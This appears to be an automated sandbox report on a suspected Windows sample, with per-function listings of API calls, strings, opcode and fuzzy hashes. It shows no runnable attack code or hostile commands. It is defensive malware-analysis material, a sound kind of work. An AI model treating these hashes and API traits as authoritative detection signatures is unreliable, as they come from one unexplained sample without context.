Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wprintf
String ID: %s (%d) : ==> %s: %s %s
API String ID: 3648134473-3128320259
Opcode ID: 70b49fbbef3025c037ce9704d7aa596cfe49c5497f537d40698e5315ce942f94
Instruction ID: b420547713a221db2659cb3d7424e2a63870482a29c62c13842f0088fd87071b
Opcode Fuzzy Hash: 70b49fbbef3025c037ce9704d7aa596cfe49c5497f537d40698e5315ce942f94
Instruction Fuzzy Hash: ED0112F6900308BFE752E7A4DD89EFB776CDB08302F4005A5BB45D2061EA749E858B75

Function 002D2A5B Relevance: 12.1, APIs: 8, Instructions: 129COMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0030C417,00000004,00000000,00000000,00000000), ref: 002D2ACF
ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,0030C417,00000004,00000000,00000000,00000000,000000FF), ref: 002D2B17
ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,0030C417,00000004,00000000,00000000,00000000), ref: 0030C46A
ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0030C417,00000004,00000000,00000000,00000000), ref: 0030C4D6

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: 2cf8e156ace89f1beed4e48589ec0d55a82ac2a7cc6431c2c1f9387e19d8d5c1
Instruction ID: 949b45b717723d7c63c44a03a7695b195c3ab8644570948f82effd85574d95dd
Opcode Fuzzy Hash: 2cf8e156ace89f1beed4e48589ec0d55a82ac2a7cc6431c2c1f9387e19d8d5c1
Instruction Fuzzy Hash: EF412530238381DAC7379F298CA8B7B3B96FB65304F54881BE087867B0C6B1AC59D710

Function 00337368 Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 0033737F

Part of subcall function 002F0FF6: std::exception::exception.LIBCMT ref: 002F102C
Part of subcall function 002F0FF6: __CxxThrowException@8.LIBCMT ref: 002F1041

ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 003373B6
RtlEnterCriticalSection.NTDLL(?), ref: 003373D2
_memmove.LIBCMT ref: 00337420
_memmove.LIBCMT ref: 0033743D
RtlLeaveCriticalSection.NTDLL(?), ref: 0033744C
ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00337461
InterlockedExchange.KERNEL32(?,000001F6), ref: 00337480

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
String ID:
API String ID: 256516436-0
Opcode ID: 3f42d68f2f3dc2c9eb1d874ff8744a4ab09f1e45cbc43f46bb0392e564e01d3e
Instruction ID: 7d0d5513248309ea2b8b454c4a1cd56b3e743943e13335490cc8f32fbd33a6c6
Opcode Fuzzy Hash: 3f42d68f2f3dc2c9eb1d874ff8744a4ab09f1e45cbc43f46bb0392e564e01d3e
Instruction Fuzzy Hash: 03317C75904209EFCF11DF64DC85AAFBBB8EF44751F1441B9FA04AB256DB309A20CBA0

Function 00356442 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 0035645A
GetDC.USER32(00000000), ref: 00356462
GetDeviceCaps.GDI32(00000000,0000005A), ref: 0035646D
ReleaseDC.USER32(00000000,00000000), ref: 00356479
CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 003564B5
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 003564C6
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00359299,?,?,000000FF,00000000,?,000000FF,?), ref: 00356500
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00356520

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: e9070cebc7d971bd89938fe150f66920e0591fb4399251de651410c6bcf6acc4
Instruction ID: 2d9e2bc76ad465b8b0ccfc1b5df196c545d0476a7b4d75f9db3253275daaf1bd
Opcode Fuzzy Hash: e9070cebc7d971bd89938fe150f66920e0591fb4399251de651410c6bcf6acc4
Instruction Fuzzy Hash: 2B316D72241614BFEB128F50CC4AFEB3FADEF0A762F054065FE089A1A1D6759841CB64

Function 0032C072 Relevance: 12.1, APIs: 8, Instructions: 92COMMON

Download Yara Rule

APIs

_memcmp.LIBCMT ref: 0032C087
_memcmp.LIBCMT ref: 0032C0A9
_memcmp.LIBCMT ref: 0032C0C1
_memcmp.LIBCMT ref: 0032C0D4
_memcmp.LIBCMT ref: 0032C0EE
_memcmp.LIBCMT ref: 0032C101
_memcmp.LIBCMT ref: 0032C119
_memcmp.LIBCMT ref: 0032C134

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: a4bc2546451ddff4d5836ad8ae684efd0abd76adbb5a2a61b21af99192cff2a2
Instruction ID: dd4bbbfc5e35efb91b68f81f8598309b299e1fcd56986fc17232854ebb74846c
Opcode Fuzzy Hash: a4bc2546451ddff4d5836ad8ae684efd0abd76adbb5a2a61b21af99192cff2a2
Instruction Fuzzy Hash: E0210471660629FBD216A520AC43FBFB39CAF207D8B459020FE05D62C3E751EE3185E5

Function 0033D7F8 Relevance: 10.8, APIs: 7, Instructions: 283COMMON

Download Yara Rule

APIs

Part of subcall function 002D9997: __itow.LIBCMT ref: 002D99C2
Part of subcall function 002D9997: __swprintf.LIBCMT ref: 002D9A0C

CoInitialize.OLE32(00000000), ref: 0033D855
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 0033D8E8
SHGetDesktopFolder.SHELL32(?), ref: 0033D8FC
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 0033D9B7
_memset.LIBCMT ref: 0033DA4C
SHBrowseForFolderW.SHELL32(?), ref: 0033DA88
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0033DAAB

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: Folder$BrowseCreateDesktopFromInitializeItemListLocationPathShellSpecial__itow__swprintf_memset
String ID:
API String ID: 3008154123-0
Opcode ID: e695526ddda970aa8cbcf4c9171a752333eda991c37e5ab0a2fec2e012d6d7fd
Instruction ID: e257ce4becc0969f776ed784c7842c2ece354d11bbb39f88369d3a9c013efab1
Opcode Fuzzy Hash: e695526ddda970aa8cbcf4c9171a752333eda991c37e5ab0a2fec2e012d6d7fd
Instruction Fuzzy Hash: 52B1EA75A10219AFDB05DF64D889EAEBBB9EF48304F048469F905EB261DB30ED41CB50

Function 002D1424 Relevance: 10.7, APIs: 7, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a5237f2b903d26e107711c63bd62e8162a2a1f79da94eec61388447b3c3da942
Instruction ID: 88c97d35091c953ca1853af3e397de8b87df202ffe63f3b25895fa9536aeff62
Opcode Fuzzy Hash: a5237f2b903d26e107711c63bd62e8162a2a1f79da94eec61388447b3c3da942
Instruction Fuzzy Hash: B4715930910109FFCB059F98CC49ABEBB79FF85314F14815AF915AB291C734AA61CFA0

Function 0035B60B Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(019457D8), ref: 0035B6A5
IsWindowEnabled.USER32(019457D8), ref: 0035B6B1
SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0035B795
SendMessageW.USER32(019457D8,000000B0,?,?), ref: 0035B7CC
IsDlgButtonChecked.USER32(?,?), ref: 0035B809
GetWindowLongW.USER32(019457D8,000000EC), ref: 0035B82B
SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0035B843

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: MessageSendWindow$ButtonCheckedEnabledLong
String ID:
API String ID: 4072528602-0
Opcode ID: 989a0c54b6022b5a5bd561e5d6057e10cecd549d3cc0a375623a0c30547a0ba3
Instruction ID: e8f2b89f88104983f3ac1aa23490654085d439f6b329c1e900db9c9f8a69f384
Opcode Fuzzy Hash: 989a0c54b6022b5a5bd561e5d6057e10cecd549d3cc0a375623a0c30547a0ba3
Instruction Fuzzy Hash: F871AC34601204AFDB229F64C8A5FAAFBB9FF49342F164069FD46972B1C731A949CB50

Function 003486D0 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 197COMMON

Download Yara Rule

APIs

Part of subcall function 002D9997: __itow.LIBCMT ref: 002D99C2
Part of subcall function 002D9997: __swprintf.LIBCMT ref: 002D9A0C

CoInitialize.OLE32 ref: 00348718
VariantInit.OLEAUT32(?), ref: 00348890
VariantClear.OLEAUT32(?), ref: 003488F1

Strings

Failed to create object, xrefs: 0034878E, 00348844
Invalid parameter, xrefs: 0034880F
NULL Pointer assignment, xrefs: 003487C8

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: Variant$ClearInitInitialize__itow__swprintf
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 4106155388-1287834457
Opcode ID: ea9e25ddc4d3fe6bb863ac336be9e2b813001b3f3d6bda91ef206516b7a126a3
Instruction ID: c68f8a34c4781939cb69c6117f96b2511ff91e1372f15048ae53931b3f6b391c
Opcode Fuzzy Hash: ea9e25ddc4d3fe6bb863ac336be9e2b813001b3f3d6bda91ef206516b7a126a3
Instruction Fuzzy Hash: CE619D70608711AFD712DF24C888B6EBBE8AF48714F10481EF9859F291CB70ED44CB92

Function 0034F732 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0034F75C
_memset.LIBCMT ref: 0034F825
ShellExecuteExW.SHELL32(?), ref: 0034F86A

Part of subcall function 002D9997: __itow.LIBCMT ref: 002D99C2
Part of subcall function 002D9997: __swprintf.LIBCMT ref: 002D9A0C

Part of subcall function 002EFEC6: _wcscpy.LIBCMT ref: 002EFEE9

GetProcessId.KERNEL32(00000000), ref: 0034F8E1
CloseHandle.KERNEL32(00000000), ref: 0034F910

Strings

@, xrefs: 0034F839

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
String ID: @
API String ID: 3522835683-2766056989
Opcode ID: d63919e2c7d02b541d5f3a5a9a0100ee4e0439bc2f5dad674b091f01b9efe9a3
Instruction ID: 578a77f9d670c79f2b4562c6380b5f5d8b32bfb197137318d949f2830d187fed
Opcode Fuzzy Hash: d63919e2c7d02b541d5f3a5a9a0100ee4e0439bc2f5dad674b091f01b9efe9a3
Instruction Fuzzy Hash: 17618C75A10629DFCB15EF54C581AAEBBF5FF48310F19846AE84AAB351CB30AD50CF90

Function 0033145D Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 0033149C
GetKeyboardState.USER32(?), ref: 003314B1
SetKeyboardState.USER32(?), ref: 00331512
PostMessageW.USER32(?,00000101,00000010,?), ref: 00331540
PostMessageW.USER32(?,00000101,00000011,?), ref: 0033155F
PostMessageW.USER32(?,00000101,00000012,?), ref: 003315A5
PostMessageW.USER32(?,00000101,0000005B,?), ref: 003315C8

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 39cc2f5d57e707c3b62133dc752be20d5e7ed2c3419945bccc551f269c2f1842
Instruction ID: 3ed17b00dd681285a9c7769aeef934e2716c73d77b3bb6f32c8ed5bd0cc1d139
Opcode Fuzzy Hash: 39cc2f5d57e707c3b62133dc752be20d5e7ed2c3419945bccc551f269c2f1842
Instruction Fuzzy Hash: C95113A0A047D53EFB3343748C85BBABEA95B46304F0D8489E5D64A8D2C3D8ECD4D750

Function 00331276 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 003312B5
GetKeyboardState.USER32(?), ref: 003312CA
SetKeyboardState.USER32(?), ref: 0033132B
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00331357
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00331374
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 003313B8
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 003313D9

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: acb8947c9c468051961712a004da399f73538e83bdd5192c3fc4c1c1c5ce13c1
Instruction ID: 1e2f149bdecd342bc6db00d04af391cdb8e371057dad53c012dc5c99fa266a36
Opcode Fuzzy Hash: acb8947c9c468051961712a004da399f73538e83bdd5192c3fc4c1c1c5ce13c1
Instruction Fuzzy Hash: 5F51F5A09047D53DFB3387258C85BBABFA95F06310F0D8989E1D48ACC2D795EC94E760

Function 0033589F Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 003358AC
_wcsncpy.LIBCMT ref: 003358E1
_wcsncpy.LIBCMT ref: 00335913
_wcsncpy.LIBCMT ref: 00335946
_wcsncpy.LIBCMT ref: 00335988
_wcsncpy.LIBCMT ref: 003359C2
_wcsncpy.LIBCMT ref: 003359F1

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: _wcsncpy$LocalTime
String ID:
API String ID: 2945705084-0
Opcode ID: 79aca0e2a1194dd325b2e62271b07853deca3f8933bff528af53af9c76b220e1
Instruction ID: 13508c96ae5a06774169b66e3082301bc514b6873c23181f770743dfa5916531
Opcode Fuzzy Hash: 79aca0e2a1194dd325b2e62271b07853deca3f8933bff528af53af9c76b220e1
Instruction Fuzzy Hash: 4D41A365C31618B6CB11FBB488869DFF7A89F05350F508572FA18E3121E734E724CBA5

Function 003338AD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 003348AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,003338D3,?), ref: 003348C7

Part of subcall function 003348AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,003338D3,?), ref: 003348E0

lstrcmpiW.KERNEL32(?,?), ref: 003338F3
_wcscmp.LIBCMT ref: 0033390F
MoveFileW.KERNEL32(?,?), ref: 00333927
_wcscat.LIBCMT ref: 0033396F
SHFileOperationW.SHELL32(?), ref: 003339DB

Strings

\*.*, xrefs: 00333969

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
String ID: \*.*
API String ID: 1377345388-1173974218
Opcode ID: ed537bb387dd8643ff5a915f802e211567d0aff3706364355d72f47a6be0d455
Instruction ID: 1b5af81e5dfc7103a96a35ad425252cc0dd99a4b1cefea61537cf084ea78330c
Opcode Fuzzy Hash: ed537bb387dd8643ff5a915f802e211567d0aff3706364355d72f47a6be0d455
Instruction Fuzzy Hash: C14180B15093849EC752EF64C481AEFB7ECAF89340F04592EB48AC7161EB74D688CB52

Function 00357500 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00357519
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 003575C0
IsMenu.USER32(?), ref: 003575D8
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00357620
DrawMenuBar.USER32 ref: 00357633

Strings

0, xrefs: 0035750D

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: Menu$Item$DrawInfoInsert_memset
String ID: 0
API String ID: 3866635326-4108050209
Opcode ID: 8493e16cfc373b86590455df8f1d926ccd934b814ab728573dee08c12ad50abd
Instruction ID: b3151f1276e01a2f826968ee40781119d7e03fe74f204aaca51ac4a63de8cb90
Opcode Fuzzy Hash: 8493e16cfc373b86590455df8f1d926ccd934b814ab728573dee08c12ad50abd
